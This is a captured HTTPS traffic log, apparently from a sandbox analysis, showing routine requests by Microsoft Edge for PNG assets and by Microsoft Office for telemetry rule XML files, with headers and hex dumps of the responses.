2024-11-11 23:06:29 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: 841505ca-d01e-002a-1366-341d42000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968vqt9xhC1EWRgten00000005p0000000009ykx Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49904	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:30 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 8a55228f-601e-0033-0c8e-34312a000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T230629Z-174f7845968glpgnhC1EWR7uec00000005pg00000000ny51 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.5	49906	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 4e338eb5-401e-0016-3ad5-3353e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230629Z-174f7845968xlwnmhC1EWR0sv800000005a000000000sbdc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.5	49911	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:30 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 6193c1ec-701e-000d-35d5-336de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230630Z-174f7845968vwdr7hC1EWRsh3w00000005k0000000008kvb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.5	49919	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:30 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: d9045f06-101e-00a2-02d5-339f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230630Z-174f7845968c2t8dhC1EWR8s2000000005dg000000002c5a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	49920	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:30 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 87508ad6-a01e-0098-68d5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230630Z-174f7845968psccphC1EWRuz9s00000005x0000000004v0z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	49921	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:30 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: aedf17c0-c01e-0046-3ad5-332db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230630Z-174f784596886s2bhC1EWR743w00000005mg00000000efp3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	49922	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:30 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: feb35d59-101e-0079-01d5-335913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230630Z-174f7845968cdxdrhC1EWRg0en00000005hg00000000c80x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.5	49925	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:30 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:30 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 30996da0-701e-006f-5cd5-33afc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230630Z-174f784596886s2bhC1EWR743w00000005h000000000rztx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:30 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.5	49931	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 648756f6-901e-0067-0fd5-33b5cb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f7845968qj8jrhC1EWRh41s00000005dg00000000qy3h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	49930	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 45a856d6-001e-0017-5bd5-330c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f7845968psccphC1EWRuz9s00000005v000000000abb1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.5	49933	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:31 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:31 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:31 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 7cd1171a-e01e-0052-10d5-33d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230631Z-174f7845968ljs8phC1EWRe6en00000005c000000000kurt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:31 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U 